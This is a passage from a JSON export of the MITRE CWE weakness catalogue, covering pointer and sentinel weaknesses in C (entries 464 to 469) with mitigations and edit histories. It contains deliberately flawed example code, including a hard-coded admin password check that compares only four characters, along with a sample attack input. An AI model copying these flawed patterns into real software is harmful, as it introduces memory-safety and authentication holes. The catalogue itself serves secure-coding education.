properly."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"If a control character, such as NULL is removed, one may cause resource access control problems."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. Not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example creates a null terminated string and prints it contents.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *foo;int counter;foo=calloc(sizeof(char)*10);for (counter=0;counter!=10;counter++) {printf(\\"%s\\\\n\\",foo);}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"foo[counter]=\'a\';","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The string foo has space for 9 characters and a null terminator, but 10 characters are written to it. As a result, the string foo is not null terminated and calling printf() on it will have unpredictable and possibly dangerous results."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Deletion of data-structure sentinel"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "NUL-Termination Problems", Page 452"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Deletion of Data-structure Sentinel","attr":{"@_Date":"2008-04-11"}}}},"464":{"attr":{"@_ID":"464","@_Name":"Addition of Data Structure Sentinel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The accidental addition of a data-structure sentinel can cause serious programming logic problems.","Extended_Description":"Data-structure sentinels are often used to mark the structure of data. A common example of this is the null character at the end of strings or a special sentinel to mark the end of a linked list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the addition or modification of sentinels.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Generally this error will cause the data structure to not work properly by truncating the data."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"Encapsulate the user from interacting with data sentinels. Validate user input to verify that sentinels are not present."},{"Phase":"Implementation","Description":"Proper error checking can reduce the risk of inadvertently introducing sentinel values into data. For example, if a parsing function fails or encounters an error, it might return a value that is the same as the sentinel."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. This is not a complete solution."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. This is not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example assigns some character values to a list of characters and prints them each individually, and then as a string. The third character value is intended to be an integer taken from user input and converted to an int.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *foo;foo=malloc(sizeof(char)*5);foo[0]=\'a\';foo[1]=\'a\';foo[2]=atoi(getc(stdin));foo[3]=\'c\';foo[4]=\'\\\\0\'printf(\\"%c %c %c %c %c \\\\n\\",foo[0],foo[1],foo[2],foo[3],foo[4]);printf(\\"%s\\\\n\\",foo);","xhtml:br":["","","","","","","",""]}},"Body_Text":"The first print statement will print each character separated by a space. However, if a non-integer is read from stdin by getc, then atoi will not make a conversion and return 0. When foo is printed as a string, the 0 at character foo[2] will act as a NULL terminator and foo[3] will never be printed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Addition of data-structure sentinel"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR03-C","Entry_Name":"Do not inadvertently truncate a null-terminated byte string"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR06-C","Entry_Name":"Do not assume that strtok() leaves the parse string unchanged"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Addition of Data-structure Sentinel","attr":{"@_Date":"2008-04-11"}}}},"466":{"attr":{"@_ID":"466","@_Name":"Return of Pointer Value Outside of Expected Range","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Illegal Pointer Value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}}]},"Notes":{"Note":{"#text":"This entry should have a chaining relationship with CWE-119 instead of a parent / child relationship, however the focus of this weakness does not map cleanly to any existing entries in CWE. A new parent is being considered which covers the more generic problem of incorrect return values. There is also an abstract relationship to weaknesses in which one component sends incorrect messages to another component; in this case, one routine is sending an incorrect value to another.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Illegal Pointer Value","attr":{"@_Date":"2008-04-11"}}}},"467":{"attr":{"@_ID":"467","@_Name":"Use of sizeof() on a Pointer Type","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code calls sizeof() on a malloced pointer type, which always returns the wordsize/8. This can produce an unexpected result if the programmer intended to determine how much memory has been allocated.","Extended_Description":"The use of sizeof() on a pointer can sometimes generate useful information. An obvious case is to find out the wordsize on a platform. More often than not, the appearance of sizeof(pointer) indicates a bug.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"131","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Memory","Read Memory"],"Note":"This error can often cause one to allocate a buffer that is much smaller than what is needed, leading to resultant weaknesses such as buffer overflows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use expressions such as \\"sizeof(*pointer)\\" instead of \\"sizeof(pointer)\\", unless you intend to run sizeof() on a pointer type to gain some platform independence or if you are allocating a variable on the stack."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Care should be taken to ensure sizeof returns the size of the data structure itself, and not the size of the pointer to the data structure.","Body_Text":["In this example, sizeof(foo) returns the size of the pointer.","In this example, sizeof(*foo) returns the size of the data structure and not the size of the pointer."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"double *foo;...foo = (double *)malloc(sizeof(foo));","xhtml:br":["",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"double *foo;...foo = (double *)malloc(sizeof(*foo));","xhtml:br":["",""]}}]},{"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv){}","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Sizeof username = %d\\\\n\\", sizeof(username));printf(\\"Sizeof pass = %d\\\\n\\", sizeof(pass));if (strncmp(username, inUser, sizeof(username))) {}if (! strncmp(pass, inPass, sizeof(pass))) {}else {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Auth failure of username using sizeof\\\\n\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Auth success of password using sizeof\\\\n\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Auth fail of password using sizeof\\\\n\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:i":"/* Because of CWE-467, the sizeof returns 4 on many platforms and architectures. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int authResult;if (argc < 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult != AUTH_SUCCESS) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}}]}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"pass5passABCDEFGHpassWORD","xhtml:br":["",""]}}],"Body_Text":["In AuthenticateUser(), because sizeof() is applied to a parameter with an array type, the sizeof() call might return 4 on many modern architectures. As a result, the strncmp() call only checks the first four characters of the input password, resulting in a partial comparison (CWE-187), leading to improper authentication (CWE-287).","Because of the partial comparison, any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","Because only 4 characters are checked, this significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"adminXYZ\\" and \\"administrator\\" will succeed for the username."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of sizeof() on a pointer type"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR01-C","Entry_Name":"Do not apply the sizeof operator to a pointer when taking the size of an array"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP10","Entry_Name":"Incorrect Buffer Length Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-442"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"468":{"attr":{"@_ID":"468","@_Name":"Incorrect Pointer Scaling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In C and C++, one may often accidentally refer to the wrong memory due to the semantics of when math operations are implicitly scaled.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Programmers may try to index from a pointer by adding a number of bytes. This is incorrect because C and C++ implicitly scale the operand by the size of the data type."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"],"Note":"Incorrect pointer scaling will often result in buffer overflow conditions. Confidentiality can be compromised if the weakness is in the context of a buffer over-read or under-read."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a platform with high-level memory abstractions."},{"Phase":"Implementation","Description":"Always use array indexing instead of direct pointer manipulation."},{"Phase":"Architecture and Design","Description":"Use technologies for preventing buffer overflows."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-55"},"Intro_Text":"This example attempts to calculate the position of the second byte of a pointer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *p = x;char * second_char = (char *)(p + 1);","xhtml:br":""}},"Body_Text":"In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unintentional pointer scaling"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR39-C","Entry_Name":"Do not add or subtract a scaled integer to a pointer","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP08-C","Entry_Name":"Ensure pointer arithmetic is used correctly"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Pointer Arithmetic", Page 277"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Unintentional Pointer Scaling","attr":{"@_Date":"2008-04-11"}}}},"469":{"attr":{"@_ID":"469","@_Name":"Use of Pointer Subtraction to Determine Size","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application subtracts one pointer from another in order to determine size, but this calculation can be incorrect if the pointers do not exist in the same memory chunk.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Save an index variable. This is the recommended solution. Rather than subtract pointers from one another, use an index variable of the same size as the pointers in question. Use this variable to \\"walk\\" from one pointer to the other and calculate the difference. Always validate this number."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example contains the method size that is used to determine the number of nodes in a linked list. The method is passed a pointer to the head of the linked list.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct node {};int size(struct node* head) {}...","xhtml:div":[{"#text":"int data;struct node* next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"struct node* current = head;struct node* tail;while (current != NULL) {}return tail - head;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"tail = current;current = current->next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}],"xhtml:br":["","","","","","","","",""],"xhtml:i":["// Returns the number of nodes in a linked list from","// the given pointer to the head of the list.","// other methods for manipulating the list"]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...int size(struct node* head) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"struct node* current = head;int count = 0;while (current != NULL) {}return count;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"count++;current = current->next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"However, the method creates a pointer that points to the end of the list and uses pointer subtraction to determine the number of nodes in the list by subtracting the tail pointer from the head pointer. There no guarantee that the pointers exist in the same memory area, therefore using pointer subtraction in this way could return incorrect results and allow other unintended behavior. In this example a counter should be used to determine the number of nodes in the list, as shown in the following code."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper pointer subtraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR36-C","Entry_Name":"Do not subtract or compare two pointers that do not refer to the same array","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in Computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE 